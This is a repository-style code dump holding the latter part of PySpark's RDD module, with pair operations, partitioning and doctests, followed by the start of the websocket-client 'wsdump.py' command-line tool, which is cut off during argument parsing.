        >>> sorted(sc.pickleFile(tmpFile.name, 5).map(str).collect())
        ['1', '2', 'rdd', 'spark']
        """
        # batchSize == 0 means "let the serializer pick the batch size".
        if batchSize == 0:
            ser = AutoBatchedSerializer(PickleSerializer())
        else:
            ser = BatchedSerializer(PickleSerializer(), batchSize)
        self._reserialize(ser)._jrdd.saveAsObjectFile(path)

    @ignore_unicode_prefix
    def saveAsTextFile(self, path, compressionCodecClass=None):
        """
        Save this RDD as a text file, using string representations of elements.

        @param path: path to text file
        @param compressionCodecClass: (None by default) string i.e.
            "org.apache.hadoop.io.compress.GzipCodec"

        >>> tempFile = NamedTemporaryFile(delete=True)
        >>> tempFile.close()
        >>> sc.parallelize(range(10)).saveAsTextFile(tempFile.name)
        >>> from fileinput import input
        >>> from glob import glob
        >>> ''.join(sorted(input(glob(tempFile.name + "/part-0000*"))))
        '0\\n1\\n2\\n3\\n4\\n5\\n6\\n7\\n8\\n9\\n'

        Empty lines are tolerated when saving to text files.
        >>> tempFile2 = NamedTemporaryFile(delete=True)
        >>> tempFile2.close()
        >>> sc.parallelize(['', 'foo', '', 'bar', '']).saveAsTextFile(tempFile2.name)
        >>> ''.join(sorted(input(glob(tempFile2.name + "/part-0000*"))))
        '\\n\\n\\nbar\\nfoo\\n'

        Using compressionCodecClass

        >>> tempFile3 = NamedTemporaryFile(delete=True)
        >>> tempFile3.close()
        >>> codec = "org.apache.hadoop.io.compress.GzipCodec"
        >>> sc.parallelize(['foo', 'bar']).saveAsTextFile(tempFile3.name, codec)
        >>> from fileinput import input, hook_compressed
        >>> result = sorted(input(glob(tempFile3.name + "/part*.gz"), openhook=hook_compressed))
        >>> b''.join(result).decode('utf-8')
        u'bar\\nfoo\\n'
        """
        def func(split, iterator):
            # Normalize every element to UTF-8 bytes before handing the
            # partition to the JVM writer.
            for x in iterator:
                if not isinstance(x, (unicode, bytes)):
                    x = unicode(x)
                if isinstance(x, unicode):
                    x = x.encode("utf-8")
                yield x
        keyed = self.mapPartitionsWithIndex(func)
        keyed._bypass_serializer = True
        if compressionCodecClass:
            compressionCodec = self.ctx._jvm.java.lang.Class.forName(compressionCodecClass)
            keyed._jrdd.map(self.ctx._jvm.BytesToString()).saveAsTextFile(path, compressionCodec)
        else:
            keyed._jrdd.map(self.ctx._jvm.BytesToString()).saveAsTextFile(path)

    # Pair functions

    def collectAsMap(self):
        """
        Return the key-value pairs in this RDD to the master as a dictionary.

        .. note:: this method should only be used if the resulting data is expected
            to be small, as all the data is loaded into the driver's memory.

        >>> m = sc.parallelize([(1, 2), (3, 4)]).collectAsMap()
        >>> m[1]
        2
        >>> m[3]
        4
        """
        return dict(self.collect())

    def keys(self):
        """
        Return an RDD with the keys of each tuple.

        >>> m = sc.parallelize([(1, 2), (3, 4)]).keys()
        >>> m.collect()
        [1, 3]
        """
        return self.map(lambda x: x[0])

    def values(self):
        """
        Return an RDD with the values of each tuple.

        >>> m = sc.parallelize([(1, 2), (3, 4)]).values()
        >>> m.collect()
        [2, 4]
        """
        return self.map(lambda x: x[1])

    def reduceByKey(self, func, numPartitions=None, partitionFunc=portable_hash):
        """
        Merge the values for each key using an associative and commutative reduce function.

        This will also perform the merging locally on each mapper before
        sending results to a reducer, similarly to a "combiner" in MapReduce.

        Output will be partitioned with C{numPartitions} partitions, or
        the default parallelism level if C{numPartitions} is not specified.
        Default partitioner is hash-partition.

        >>> from operator import add
        >>> rdd = sc.parallelize([("a", 1), ("b", 1), ("a", 1)])
        >>> sorted(rdd.reduceByKey(add).collect())
        [('a', 2), ('b', 1)]
        """
        return self.combineByKey(lambda x: x, func, func, numPartitions, partitionFunc)

    def reduceByKeyLocally(self, func):
        """
        Merge the values for each key using an associative and commutative reduce function, but
        return the results immediately to the master as a dictionary.

        This will also perform the merging locally on each mapper before
        sending results to a reducer, similarly to a "combiner" in MapReduce.

        >>> from operator import add
        >>> rdd = sc.parallelize([("a", 1), ("b", 1), ("a", 1)])
        >>> sorted(rdd.reduceByKeyLocally(add).items())
        [('a', 2), ('b', 1)]
        """
        def reducePartition(iterator):
            m = {}
            for k, v in iterator:
                m[k] = func(m[k], v) if k in m else v
            yield m

        def mergeMaps(m1, m2):
            for k, v in m2.items():
                m1[k] = func(m1[k], v) if k in m1 else v
            return m1
        return self.mapPartitions(reducePartition).reduce(mergeMaps)

    def countByKey(self):
        """
        Count the number of elements for each key, and return the result to the
        master as a dictionary.

        >>> rdd = sc.parallelize([("a", 1), ("b", 1), ("a", 1)])
        >>> sorted(rdd.countByKey().items())
        [('a', 2), ('b', 1)]
        """
        return self.map(lambda x: x[0]).countByValue()

    def join(self, other, numPartitions=None):
        """
        Return an RDD containing all pairs of elements with matching keys in
        C{self} and C{other}.
Each pair of elements will be returned as a (k, (v1, v2)) tuple, where (k, v1) is in C{self} and (k, v2) is in C{other}. Performs a hash join across the cluster. >>> x = sc.parallelize([("a", 1), ("b", 4)]) >>> y = sc.parallelize([("a", 2), ("a", 3)]) >>> sorted(x.join(y).collect()) [('a', (1, 2)), ('a', (1, 3))] """ return python_join(self, other, numPartitions) def leftOuterJoin(self, other, numPartitions=None): """ Perform a left outer join of C{self} and C{other}. For each element (k, v) in C{self}, the resulting RDD will either contain all pairs (k, (v, w)) for w in C{other}, or the pair (k, (v, None)) if no elements in C{other} have key k. Hash-partitions the resulting RDD into the given number of partitions. >>> x = sc.parallelize([("a", 1), ("b", 4)]) >>> y = sc.parallelize([("a", 2)]) >>> sorted(x.leftOuterJoin(y).collect()) [('a', (1, 2)), ('b', (4, None))] """ return python_left_outer_join(self, other, numPartitions) def rightOuterJoin(self, other, numPartitions=None): """ Perform a right outer join of C{self} and C{other}. For each element (k, w) in C{other}, the resulting RDD will either contain all pairs (k, (v, w)) for v in this, or the pair (k, (None, w)) if no elements in C{self} have key k. Hash-partitions the resulting RDD into the given number of partitions. >>> x = sc.parallelize([("a", 1), ("b", 4)]) >>> y = sc.parallelize([("a", 2)]) >>> sorted(y.rightOuterJoin(x).collect()) [('a', (2, 1)), ('b', (None, 4))] """ return python_right_outer_join(self, other, numPartitions) def fullOuterJoin(self, other, numPartitions=None): """ Perform a right outer join of C{self} and C{other}. For each element (k, v) in C{self}, the resulting RDD will either contain all pairs (k, (v, w)) for w in C{other}, or the pair (k, (v, None)) if no elements in C{other} have key k. Similarly, for each element (k, w) in C{other}, the resulting RDD will either contain all pairs (k, (v, w)) for v in C{self}, or the pair (k, (None, w)) if no elements in C{self} have key k. 
Hash-partitions the resulting RDD into the given number of partitions. >>> x = sc.parallelize([("a", 1), ("b", 4)]) >>> y = sc.parallelize([("a", 2), ("c", 8)]) >>> sorted(x.fullOuterJoin(y).collect()) [('a', (1, 2)), ('b', (4, None)), ('c', (None, 8))] """ return python_full_outer_join(self, other, numPartitions) # TODO: add option to control map-side combining # portable_hash is used as default, because builtin hash of None is different # cross machines. def partitionBy(self, numPartitions, partitionFunc=portable_hash): """ Return a copy of the RDD partitioned using the specified partitioner. >>> pairs = sc.parallelize([1, 2, 3, 4, 2, 4, 1]).map(lambda x: (x, x)) >>> sets = pairs.partitionBy(2).glom().collect() >>> len(set(sets[0]).intersection(set(sets[1]))) 0 """ if numPartitions is None: numPartitions = self._defaultReducePartitions() partitioner = Partitioner(numPartitions, partitionFunc) if self.partitioner == partitioner: return self # Transferring O(n) objects to Java is too expensive. # Instead, we'll form the hash buckets in Python, # transferring O(numPartitions) objects to Java. # Each object is a (splitNumber, [objects]) pair. # In order to avoid too huge objects, the objects are # grouped into chunks. 
outputSerializer = self.ctx._unbatched_serializer limit = (_parse_memory(self.ctx._conf.get( "spark.python.worker.memory", "512m")) / 2) def add_shuffle_key(split, iterator): buckets = defaultdict(list) c, batch = 0, min(10 * numPartitions, 1000) for k, v in iterator: buckets[partitionFunc(k) % numPartitions].append((k, v)) c += 1 # check used memory and avg size of chunk of objects if (c % 1000 == 0 and get_used_memory() > limit or c > batch): n, size = len(buckets), 0 for split in list(buckets.keys()): yield pack_long(split) d = outputSerializer.dumps(buckets[split]) del buckets[split] yield d size += len(d) avg = int(size / n) >> 20 # let 1M < avg < 10M if avg < 1: batch *= 1.5 elif avg > 10: batch = max(int(batch / 1.5), 1) c = 0 for split, items in buckets.items(): yield pack_long(split) yield outputSerializer.dumps(items) keyed = self.mapPartitionsWithIndex(add_shuffle_key, preservesPartitioning=True) keyed._bypass_serializer = True with SCCallSiteSync(self.context) as css: pairRDD = self.ctx._jvm.PairwiseRDD( keyed._jrdd.rdd()).asJavaPairRDD() jpartitioner = self.ctx._jvm.PythonPartitioner(numPartitions, id(partitionFunc)) jrdd = self.ctx._jvm.PythonRDD.valueOfPair(pairRDD.partitionBy(jpartitioner)) rdd = RDD(jrdd, self.ctx, BatchedSerializer(outputSerializer)) rdd.partitioner = partitioner return rdd # TODO: add control over map-side aggregation def combineByKey(self, createCombiner, mergeValue, mergeCombiners, numPartitions=None, partitionFunc=portable_hash): """ Generic function to combine the elements for each key using a custom set of aggregation functions. Turns an RDD[(K, V)] into a result of type RDD[(K, C)], for a "combined type" C. 
Users provide three functions: - C{createCombiner}, which turns a V into a C (e.g., creates a one-element list) - C{mergeValue}, to merge a V into a C (e.g., adds it to the end of a list) - C{mergeCombiners}, to combine two C's into a single one (e.g., merges the lists) To avoid memory allocation, both mergeValue and mergeCombiners are allowed to modify and return their first argument instead of creating a new C. In addition, users can control the partitioning of the output RDD. .. note:: V and C can be different -- for example, one might group an RDD of type (Int, Int) into an RDD of type (Int, List[Int]). >>> x = sc.parallelize([("a", 1), ("b", 1), ("a", 2)]) >>> def to_list(a): ... return [a] ... >>> def append(a, b): ... a.append(b) ... return a ... >>> def extend(a, b): ... a.extend(b) ... return a ... >>> sorted(x.combineByKey(to_list, append, extend).collect()) [('a', [1, 2]), ('b', [1])] """ if numPartitions is None: numPartitions = self._defaultReducePartitions() serializer = self.ctx.serializer memory = self._memory_limit() agg = Aggregator(createCombiner, mergeValue, mergeCombiners) def combineLocally(iterator): merger = ExternalMerger(agg, memory * 0.9, serializer) merger.mergeValues(iterator) return merger.items() locally_combined = self.mapPartitions(combineLocally, preservesPartitioning=True) shuffled = locally_combined.partitionBy(numPartitions, partitionFunc) def _mergeCombiners(iterator): merger = ExternalMerger(agg, memory, serializer) merger.mergeCombiners(iterator) return merger.items() return shuffled.mapPartitions(_mergeCombiners, preservesPartitioning=True) def aggregateByKey(self, zeroValue, seqFunc, combFunc, numPartitions=None, partitionFunc=portable_hash): """ Aggregate the values of each key, using given combine functions and a neutral "zero value". This function can return a different result type, U, than the type of the values in this RDD, V. 
Thus, we need one operation for merging a V into a U and one operation for merging two U's, The former operation is used for merging values within a partition, and the latter is used for merging values between partitions. To avoid memory allocation, both of these functions are allowed to modify and return their first argument instead of creating a new U. """ def createZero(): return copy.deepcopy(zeroValue) return self.combineByKey( lambda v: seqFunc(createZero(), v), seqFunc, combFunc, numPartitions, partitionFunc) def foldByKey(self, zeroValue, func, numPartitions=None, partitionFunc=portable_hash): """ Merge the values for each key using an associative function "func" and a neutral "zeroValue" which may be added to the result an arbitrary number of times, and must not change the result (e.g., 0 for addition, or 1 for multiplication.). >>> rdd = sc.parallelize([("a", 1), ("b", 1), ("a", 1)]) >>> from operator import add >>> sorted(rdd.foldByKey(0, add).collect()) [('a', 2), ('b', 1)] """ def createZero(): return copy.deepcopy(zeroValue) return self.combineByKey(lambda v: func(createZero(), v), func, func, numPartitions, partitionFunc) def _memory_limit(self): return _parse_memory(self.ctx._conf.get("spark.python.worker.memory", "512m")) # TODO: support variant with custom partitioner def groupByKey(self, numPartitions=None, partitionFunc=portable_hash): """ Group the values for each key in the RDD into a single sequence. Hash-partitions the resulting RDD with numPartitions partitions. .. note:: If you are grouping in order to perform an aggregation (such as a sum or average) over each key, using reduceByKey or aggregateByKey will provide much better performance. 
>>> rdd = sc.parallelize([("a", 1), ("b", 1), ("a", 1)]) >>> sorted(rdd.groupByKey().mapValues(len).collect()) [('a', 2), ('b', 1)] >>> sorted(rdd.groupByKey().mapValues(list).collect()) [('a', [1, 1]), ('b', [1])] """ def createCombiner(x): return [x] def mergeValue(xs, x): xs.append(x) return xs def mergeCombiners(a, b): a.extend(b) return a memory = self._memory_limit() serializer = self._jrdd_deserializer agg = Aggregator(createCombiner, mergeValue, mergeCombiners) def combine(iterator): merger = ExternalMerger(agg, memory * 0.9, serializer) merger.mergeValues(iterator) return merger.items() locally_combined = self.mapPartitions(combine, preservesPartitioning=True) shuffled = locally_combined.partitionBy(numPartitions, partitionFunc) def groupByKey(it): merger = ExternalGroupBy(agg, memory, serializer) merger.mergeCombiners(it) return merger.items() return shuffled.mapPartitions(groupByKey, True).mapValues(ResultIterable) def flatMapValues(self, f): """ Pass each value in the key-value pair RDD through a flatMap function without changing the keys; this also retains the original RDD's partitioning. >>> x = sc.parallelize([("a", ["x", "y", "z"]), ("b", ["p", "r"])]) >>> def f(x): return x >>> x.flatMapValues(f).collect() [('a', 'x'), ('a', 'y'), ('a', 'z'), ('b', 'p'), ('b', 'r')] """ flat_map_fn = lambda kv: ((kv[0], x) for x in f(kv[1])) return self.flatMap(flat_map_fn, preservesPartitioning=True) def mapValues(self, f): """ Pass each value in the key-value pair RDD through a map function without changing the keys; this also retains the original RDD's partitioning. >>> x = sc.parallelize([("a", ["apple", "banana", "lemon"]), ("b", ["grapes"])]) >>> def f(x): return len(x) >>> x.mapValues(f).collect() [('a', 3), ('b', 1)] """ map_values_fn = lambda kv: (kv[0], f(kv[1])) return self.map(map_values_fn, preservesPartitioning=True) def groupWith(self, other, *others): """ Alias for cogroup but with support for multiple RDDs. 
>>> w = sc.parallelize([("a", 5), ("b", 6)]) >>> x = sc.parallelize([("a", 1), ("b", 4)]) >>> y = sc.parallelize([("a", 2)]) >>> z = sc.parallelize([("b", 42)]) >>> [(x, tuple(map(list, y))) for x, y in sorted(list(w.groupWith(x, y, z).collect()))] [('a', ([5], [1], [2], [])), ('b', ([6], [4], [], [42]))] """ return python_cogroup((self, other) + others, numPartitions=None) # TODO: add variant with custom parittioner def cogroup(self, other, numPartitions=None): """ For each key k in C{self} or C{other}, return a resulting RDD that contains a tuple with the list of values for that key in C{self} as well as C{other}. >>> x = sc.parallelize([("a", 1), ("b", 4)]) >>> y = sc.parallelize([("a", 2)]) >>> [(x, tuple(map(list, y))) for x, y in sorted(list(x.cogroup(y).collect()))] [('a', ([1], [2])), ('b', ([4], []))] """ return python_cogroup((self, other), numPartitions) def sampleByKey(self, withReplacement, fractions, seed=None): """ Return a subset of this RDD sampled by key (via stratified sampling). Create a sample of this RDD using variable sampling rates for different keys as specified by fractions, a key to sampling rate map. >>> fractions = {"a": 0.2, "b": 0.1} >>> rdd = sc.parallelize(fractions.keys()).cartesian(sc.parallelize(range(0, 1000))) >>> sample = dict(rdd.sampleByKey(False, fractions, 2).groupByKey().collect()) >>> 100 < len(sample["a"]) < 300 and 50 < len(sample["b"]) < 150 True >>> max(sample["a"]) <= 999 and min(sample["a"]) >= 0 True >>> max(sample["b"]) <= 999 and min(sample["b"]) >= 0 True """ for fraction in fractions.values(): assert fraction >= 0.0, "Negative fraction value: %s" % fraction return self.mapPartitionsWithIndex( RDDStratifiedSampler(withReplacement, fractions, seed).func, True) def subtractByKey(self, other, numPartitions=None): """ Return each (key, value) pair in C{self} that has no pair with matching key in C{other}. 
>>> x = sc.parallelize([("a", 1), ("b", 4), ("b", 5), ("a", 2)]) >>> y = sc.parallelize([("a", 3), ("c", None)]) >>> sorted(x.subtractByKey(y).collect()) [('b', 4), ('b', 5)] """ def filter_func(pair): key, (val1, val2) = pair return val1 and not val2 return self.cogroup(other, numPartitions).filter(filter_func).flatMapValues(lambda x: x[0]) def subtract(self, other, numPartitions=None): """ Return each value in C{self} that is not contained in C{other}. >>> x = sc.parallelize([("a", 1), ("b", 4), ("b", 5), ("a", 3)]) >>> y = sc.parallelize([("a", 3), ("c", None)]) >>> sorted(x.subtract(y).collect()) [('a', 1), ('b', 4), ('b', 5)] """ # note: here 'True' is just a placeholder rdd = other.map(lambda x: (x, True)) return self.map(lambda x: (x, True)).subtractByKey(rdd, numPartitions).keys() def keyBy(self, f): """ Creates tuples of the elements in this RDD by applying C{f}. >>> x = sc.parallelize(range(0,3)).keyBy(lambda x: x*x) >>> y = sc.parallelize(zip(range(0,5), range(0,5))) >>> [(x, list(map(list, y))) for x, y in sorted(x.cogroup(y).collect())] [(0, [[0], [0]]), (1, [[1], [1]]), (2, [[], [2]]), (3, [[], [3]]), (4, [[2], [4]])] """ return self.map(lambda x: (f(x), x)) def repartition(self, numPartitions): """ Return a new RDD that has exactly numPartitions partitions. Can increase or decrease the level of parallelism in this RDD. Internally, this uses a shuffle to redistribute data. If you are decreasing the number of partitions in this RDD, consider using `coalesce`, which can avoid performing a shuffle. >>> rdd = sc.parallelize([1,2,3,4,5,6,7], 4) >>> sorted(rdd.glom().collect()) [[1], [2, 3], [4, 5], [6, 7]] >>> len(rdd.repartition(2).glom().collect()) 2 >>> len(rdd.repartition(10).glom().collect()) 10 """ return self.coalesce(numPartitions, shuffle=True) def coalesce(self, numPartitions, shuffle=False): """ Return a new RDD that is reduced into `numPartitions` partitions. 
>>> sc.parallelize([1, 2, 3, 4, 5], 3).glom().collect() [[1], [2, 3], [4, 5]] >>> sc.parallelize([1, 2, 3, 4, 5], 3).coalesce(1).glom().collect() [[1, 2, 3, 4, 5]] """ if shuffle: # Decrease the batch size in order to distribute evenly the elements across output # partitions. Otherwise, repartition will possibly produce highly skewed partitions. batchSize = min(10, self.ctx._batchSize or 1024) ser = BatchedSerializer(PickleSerializer(), batchSize) selfCopy = self._reserialize(ser) jrdd_deserializer = selfCopy._jrdd_deserializer jrdd = selfCopy._jrdd.coalesce(numPartitions, shuffle) else: jrdd_deserializer = self._jrdd_deserializer jrdd = self._jrdd.coalesce(numPartitions, shuffle) return RDD(jrdd, self.ctx, jrdd_deserializer) def zip(self, other): """ Zips this RDD with another one, returning key-value pairs with the first element in each RDD second element in each RDD, etc. Assumes that the two RDDs have the same number of partitions and the same number of elements in each partition (e.g. one was made through a map on the other). 
>>> x = sc.parallelize(range(0,5)) >>> y = sc.parallelize(range(1000, 1005)) >>> x.zip(y).collect() [(0, 1000), (1, 1001), (2, 1002), (3, 1003), (4, 1004)] """ def get_batch_size(ser): if isinstance(ser, BatchedSerializer): return ser.batchSize return 1 # not batched def batch_as(rdd, batchSize): return rdd._reserialize(BatchedSerializer(PickleSerializer(), batchSize)) my_batch = get_batch_size(self._jrdd_deserializer) other_batch = get_batch_size(other._jrdd_deserializer) if my_batch != other_batch or not my_batch: # use the smallest batchSize for both of them batchSize = min(my_batch, other_batch) if batchSize <= 0: # auto batched or unlimited batchSize = 100 other = batch_as(other, batchSize) self = batch_as(self, batchSize) if self.getNumPartitions() != other.getNumPartitions(): raise ValueError("Can only zip with RDD which has the same number of partitions") # There will be an Exception in JVM if there are different number # of items in each partitions. pairRDD = self._jrdd.zip(other._jrdd) deserializer = PairDeserializer(self._jrdd_deserializer, other._jrdd_deserializer) return RDD(pairRDD, self.ctx, deserializer) def zipWithIndex(self): """ Zips this RDD with its element indices. The ordering is first based on the partition index and then the ordering of items within each partition. So the first item in the first partition gets index 0, and the last item in the last partition receives the largest index. This method needs to trigger a spark job when this RDD contains more than one partitions. 
>>> sc.parallelize(["a", "b", "c", "d"], 3).zipWithIndex().collect() [('a', 0), ('b', 1), ('c', 2), ('d', 3)] """ starts = [0] if self.getNumPartitions() > 1: nums = self.mapPartitions(lambda it: [sum(1 for i in it)]).collect() for i in range(len(nums) - 1): starts.append(starts[-1] + nums[i]) def func(k, it): for i, v in enumerate(it, starts[k]): yield v, i return self.mapPartitionsWithIndex(func) def zipWithUniqueId(self): """ Zips this RDD with generated unique Long ids. Items in the kth partition will get ids k, n+k, 2*n+k, ..., where n is the number of partitions. So there may exist gaps, but this method won't trigger a spark job, which is different from L{zipWithIndex} >>> sc.parallelize(["a", "b", "c", "d", "e"], 3).zipWithUniqueId().collect() [('a', 0), ('b', 1), ('c', 4), ('d', 2), ('e', 5)] """ n = self.getNumPartitions() def func(k, it): for i, v in enumerate(it): yield v, i * n + k return self.mapPartitionsWithIndex(func) def name(self): """ Return the name of this RDD. """ n = self._jrdd.name() if n: return n @ignore_unicode_prefix def setName(self, name): """ Assign a name to this RDD. >>> rdd1 = sc.parallelize([1, 2]) >>> rdd1.setName('RDD1').name() u'RDD1' """ self._jrdd.setName(name) return self def toDebugString(self): """ A description of this RDD and its recursive dependencies for debugging. """ debug_string = self._jrdd.toDebugString() if debug_string: return debug_string.encode('utf-8') def getStorageLevel(self): """ Get the RDD's current storage level. 
>>> rdd1 = sc.parallelize([1,2]) >>> rdd1.getStorageLevel() StorageLevel(False, False, False, False, 1) >>> print(rdd1.getStorageLevel()) Serialized 1x Replicated """ java_storage_level = self._jrdd.getStorageLevel() storage_level = StorageLevel(java_storage_level.useDisk(), java_storage_level.useMemory(), java_storage_level.useOffHeap(), java_storage_level.deserialized(), java_storage_level.replication()) return storage_level def _defaultReducePartitions(self): """ Returns the default number of partitions to use during reduce tasks (e.g., groupBy). If spark.default.parallelism is set, then we'll use the value from SparkContext defaultParallelism, otherwise we'll use the number of partitions in this RDD. This mirrors the behavior of the Scala Partitioner#defaultPartitioner, intended to reduce the likelihood of OOMs. Once PySpark adopts Partitioner-based APIs, this behavior will be inherent. """ if self.ctx._conf.contains("spark.default.parallelism"): return self.ctx.defaultParallelism else: return self.getNumPartitions() def lookup(self, key): """ Return the list of values in the RDD for key `key`. This operation is done efficiently if the RDD has a known partitioner by only searching the partition that the key maps to. >>> l = range(1000) >>> rdd = sc.parallelize(zip(l, l), 10) >>> rdd.lookup(42) # slow [42] >>> sorted = rdd.sortByKey() >>> sorted.lookup(42) # fast [42] >>> sorted.lookup(1024) [] >>> rdd2 = sc.parallelize([(('a', 'b'), 'c')]).groupByKey() >>> list(rdd2.lookup(('a', 'b'))[0]) ['c'] """ values = self.filter(lambda kv: kv[0] == key).values() if self.partitioner is not None: return self.ctx.runJob(values, lambda x: x, [self.partitioner(key)]) return values.collect() def _to_java_object_rdd(self): """ Return a JavaRDD of Object by unpickling It will convert each Python object into Java object by Pyrolite, whenever the RDD is serialized in batch or not. 
""" rdd = self._pickled() return self.ctx._jvm.SerDeUtil.pythonToJava(rdd._jrdd, True) def countApprox(self, timeout, confidence=0.95): """ .. note:: Experimental Approximate version of count() that returns a potentially incomplete result within a timeout, even if not all tasks have finished. >>> rdd = sc.parallelize(range(1000), 10) >>> rdd.countApprox(1000, 1.0) 1000 """ drdd = self.mapPartitions(lambda it: [float(sum(1 for i in it))]) return int(drdd.sumApprox(timeout, confidence)) def sumApprox(self, timeout, confidence=0.95): """ .. note:: Experimental Approximate operation to return the sum within a timeout or meet the confidence. >>> rdd = sc.parallelize(range(1000), 10) >>> r = sum(range(1000)) >>> abs(rdd.sumApprox(1000) - r) / r < 0.05 True """ jrdd = self.mapPartitions(lambda it: [float(sum(it))])._to_java_object_rdd() jdrdd = self.ctx._jvm.JavaDoubleRDD.fromRDD(jrdd.rdd()) r = jdrdd.sumApprox(timeout, confidence).getFinalValue() return BoundedFloat(r.mean(), r.confidence(), r.low(), r.high()) def meanApprox(self, timeout, confidence=0.95): """ .. note:: Experimental Approximate operation to return the mean within a timeout or meet the confidence. >>> rdd = sc.parallelize(range(1000), 10) >>> r = sum(range(1000)) / 1000.0 >>> abs(rdd.meanApprox(1000) - r) / r < 0.05 True """ jrdd = self.map(float)._to_java_object_rdd() jdrdd = self.ctx._jvm.JavaDoubleRDD.fromRDD(jrdd.rdd()) r = jdrdd.meanApprox(timeout, confidence).getFinalValue() return BoundedFloat(r.mean(), r.confidence(), r.low(), r.high()) def countApproxDistinct(self, relativeSD=0.05): """ .. note:: Experimental Return approximate number of distinct elements in the RDD. The algorithm used is based on streamlib's implementation of `"HyperLogLog in Practice: Algorithmic Engineering of a State of The Art Cardinality Estimation Algorithm", available here <http://dx.doi.org/10.1145/2452376.2452456>`_. :param relativeSD: Relative accuracy. Smaller values create counters that require more space. 
It must be greater than 0.000017. >>> n = sc.parallelize(range(1000)).map(str).countApproxDistinct() >>> 900 < n < 1100 True >>> n = sc.parallelize([i % 20 for i in range(1000)]).countApproxDistinct() >>> 16 < n < 24 True """ if relativeSD < 0.000017: raise ValueError("relativeSD should be greater than 0.000017") # the hash space in Java is 2^32 hashRDD = self.map(lambda x: portable_hash(x) & 0xFFFFFFFF) return hashRDD._to_java_object_rdd().countApproxDistinct(relativeSD) def toLocalIterator(self): """ Return an iterator that contains all of the elements in this RDD. The iterator will consume as much memory as the largest partition in this RDD. >>> rdd = sc.parallelize(range(10)) >>> [x for x in rdd.toLocalIterator()] [0, 1, 2, 3, 4, 5, 6, 7, 8, 9] """ with SCCallSiteSync(self.context) as css: port = self.ctx._jvm.PythonRDD.toLocalIteratorAndServe(self._jrdd.rdd()) return _load_from_socket(port, self._jrdd_deserializer) def _prepare_for_python_RDD(sc, command): # the serialized command will be compressed by broadcast ser = CloudPickleSerializer() pickled_command = ser.dumps(command) if len(pickled_command) > (1 << 20): # 1M # The broadcast will have same life cycle as created PythonRDD broadcast = sc.broadcast(pickled_command) pickled_command = ser.dumps(broadcast) broadcast_vars = [x._jbroadcast for x in sc._pickled_broadcast_vars] sc._pickled_broadcast_vars.clear() return pickled_command, broadcast_vars, sc.environment, sc._python_includes def _wrap_function(sc, func, deserializer, serializer, profiler=None): assert deserializer, "deserializer should not be empty" assert serializer, "serializer should not be empty" command = (func, profiler, deserializer, serializer) pickled_command, broadcast_vars, env, includes = _prepare_for_python_RDD(sc, command) return sc._jvm.PythonFunction(bytearray(pickled_command), env, includes, sc.pythonExec, sc.pythonVer, broadcast_vars, sc._javaAccumulator) class PipelinedRDD(RDD): """ Pipelined maps: >>> rdd = sc.parallelize([1, 2, 
3, 4]) >>> rdd.map(lambda x: 2 * x).cache().map(lambda x: 2 * x).collect() [4, 8, 12, 16] >>> rdd.map(lambda x: 2 * x).map(lambda x: 2 * x).collect() [4, 8, 12, 16] Pipelined reduces: >>> from operator import add >>> rdd.map(lambda x: 2 * x).reduce(add) 20 >>> rdd.flatMap(lambda x: [x, x]).reduce(add) 20 """ def __init__(self, prev, func, preservesPartitioning=False): if not isinstance(prev, PipelinedRDD) or not prev._is_pipelinable(): # This transformation is the first in its stage: self.func = func self.preservesPartitioning = preservesPartitioning self._prev_jrdd = prev._jrdd self._prev_jrdd_deserializer = prev._jrdd_deserializer else: prev_func = prev.func def pipeline_func(split, iterator): return func(split, prev_func(split, iterator)) self.func = pipeline_func self.preservesPartitioning = \ prev.preservesPartitioning and preservesPartitioning self._prev_jrdd = prev._prev_jrdd # maintain the pipeline self._prev_jrdd_deserializer = prev._prev_jrdd_deserializer self.is_cached = False self.is_checkpointed = False self.ctx = prev.ctx self.prev = prev self._jrdd_val = None self._id = None self._jrdd_deserializer = self.ctx.serializer self._bypass_serializer = False self.partitioner = prev.partitioner if self.preservesPartitioning else None def getNumPartitions(self): return self._prev_jrdd.partitions().size() @property def _jrdd(self): if self._jrdd_val: return self._jrdd_val if self._bypass_serializer: self._jrdd_deserializer = NoOpSerializer() if self.ctx.profiler_collector: profiler = self.ctx.profiler_collector.new_profiler(self.ctx) else: profiler = None wrapped_func = _wrap_function(self.ctx, self.func, self._prev_jrdd_deserializer, self._jrdd_deserializer, profiler) python_rdd = self.ctx._jvm.PythonRDD(self._prev_jrdd.rdd(), wrapped_func, self.preservesPartitioning) self._jrdd_val = python_rdd.asJavaRDD() if profiler: self._id = self._jrdd_val.id() self.ctx.profiler_collector.add_profiler(self._id, profiler) return self._jrdd_val def id(self): if self._id 
is None: self._id = self._jrdd.id() return self._id def _is_pipelinable(self): return not (self.is_cached or self.is_checkpointed) def _test(): import doctest from pyspark.context import SparkContext globs = globals().copy() # The small batch size here ensures that we see multiple batches, # even in these small test examples: globs['sc'] = SparkContext('local[4]', 'PythonTest') (failure_count, test_count) = doctest.testmod( globs=globs, optionflags=doctest.ELLIPSIS) globs['sc'].stop() if failure_count: exit(-1) if __name__ == "__main__": _test()
wsdump.py
#!/Users/jenfang/deepWordBug/Adversarial-Playground-Text-viz/virt/bin/python3
"""WebSocket Simple Dump Tool.

Connects to a WebSocket URL, echoes every received frame to stdout (on a
background thread) and sends each line typed at the prompt to the server.
"""
import argparse
import code
import sys
import threading
import time
import ssl
import six
from six.moves.urllib.parse import urlparse

import websocket
try:
    # Optional: enables line editing / history at the interactive prompt.
    import readline
except ImportError:
    pass


def get_encoding():
    """Return stdin's encoding, lower-cased, defaulting to utf-8.

    stdin may have no ``encoding`` attribute (e.g. when piped), in which
    case utf-8 is assumed.
    """
    encoding = getattr(sys.stdin, "encoding", "")
    if not encoding:
        return "utf-8"
    else:
        return encoding.lower()


OPCODE_DATA = (websocket.ABNF.OPCODE_TEXT, websocket.ABNF.OPCODE_BINARY)
ENCODING = get_encoding()


class VAction(argparse.Action):
    """argparse action mapping -v / -v N / -vv to an integer verbosity level."""

    def __call__(self, parser, args, values, option_string=None):
        if values is None:
            # bare "-v" with no value
            values = "1"
        try:
            values = int(values)
        except ValueError:
            # e.g. "-vvv" delivers the string "vv": count the v's.
            values = values.count("v") + 1
        setattr(args, self.dest, values)


def parse_args():
    """Build and run the command-line parser; return the parsed namespace."""
    parser = argparse.ArgumentParser(description="WebSocket Simple Dump Tool")
    parser.add_argument("url", metavar="ws_url",
                        help="websocket url. ex. ws://echo.websocket.org/")
    parser.add_argument("-p", "--proxy",
                        help="proxy url. ex. http://127.0.0.1:8080")
    parser.add_argument("-v", "--verbose", default=0, nargs='?', action=VAction,
                        dest="verbose",
                        help="set verbose mode. If set to 1, show opcode. "
                        "If set to 2, enable to trace websocket module")
